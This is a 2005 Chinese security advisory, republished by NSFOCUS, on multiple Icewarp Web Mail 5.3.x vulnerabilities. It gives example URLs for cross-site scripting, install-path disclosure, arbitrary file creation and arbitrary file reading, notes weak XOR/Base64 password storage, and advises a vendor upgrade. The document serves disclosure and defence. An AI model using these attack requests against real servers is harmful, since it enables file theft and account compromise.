安全研究

安全漏洞
Icewarp Web Mail存在多个安全漏洞

发布日期:2005-01-29
更新日期:2005-01-31

受影响系统:
Icewarp Web Mail 5.3.2
Icewarp Web Mail 5.3.0
描述:
CVE(CAN) ID: CVE-2005-0320,CVE-2005-0321,CVE-2005-0322

MERAK Mail Server使用Icewarp Web Mail作为WEB邮件系统。

Icewarp web mail存在多个安全问题,远程攻击者可以利用这些漏洞建立任意文件,进行跨站脚本,获得安装路径等攻击。

1、多个跨站脚本:

拥有帐户的远程用户,可通过如下页面进行跨站脚本攻击:

login.html
accountsettings_add.html
calendar_addnote.html
calendar_addtask.html
calendar_addevent.html

如:

http://localhost:32000/mail/login.html?username=[xss_here]
http://localhost:32000/mail/accountsettings_add.html?id=[]&Save_x=1&account[EMAIL]=hac \
ker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&accoun \
t[HOSTPASS2]=31337&accountid=[xss_here] http://localhost:32000/mail/calendar.html -> \
AddNote -> [Title]= [xss_here] http://localhost:32000/mail/calendar.html -> AddTask \
-> [Note]=[xss_here] http://localhost:32000/mail/calendar.html -> AddEvent -> \
[Note]=[xss_here] http://localhost:32000/mail/calendar.html -> AddEvent -> [Title]= \
[xss_here] http://localhost:32000/mail/calendar.html -> AddEvent -> [Location]= \
[xss_here]


2、安装路径泄露

拥有帐户的远程用户,可通过如下请求获得安装路径信息:

http://localhost:32000/mail/calendar_d.html?id=[sessionid]
http://localhost:32000/mail/calendar_m.html?id=[sessionid]
http://localhost:32000/mail/calendar_w.html?id=[sessionid]
http://localhost:32000/mail/calendar_y.html?id=[sessionid]


3、用户密码简单加密

users.cfg, settings.cfg (XOR), users.dat, user.dat (BASE64)中的用户密码加密非常简单,攻击者可以通过访问这些文件获得用户和管理员密码。

4、任意文件建立

远程用户可以通过提交如下请求,在系统中建立任意内容的文件,文件路径为:[MerakDir]\webmail\users\[Domain]\[User]\accounts.dat.

http://localhost:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[E \
MAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=313 \
37&account[HOSTPASS2]=31337&accountid=[arbitary text]

5、移动和查看系统任意文件:

拥有帐户的远程用户可以一定本地系统上的任意文件,文件会被移到[MerakDir]\webmail\users\[Domain]\[User]目录中,并更改为import.tmp,攻击者可以查看此文件或者导出/入到地址簿。此漏洞可以用来查看任意文件内容,或进行拒绝服务攻击。

http://localhost:32000/importaction.html?id=[sessionid]&importfile=[arbitrary \
path]&action=upload&Import=1&importfile_size=1000000

<*来源:ShineShadow (ss_contacts@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110693950205007&w=2
*>

建议:
厂商补丁:

Icewarp
-------
升级到MERAK Mail Server 7.6.4r with Icewarp Web Mail 5.3.2最新版本:

http://www.merakmailserver.com/

浏览次数:3627
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障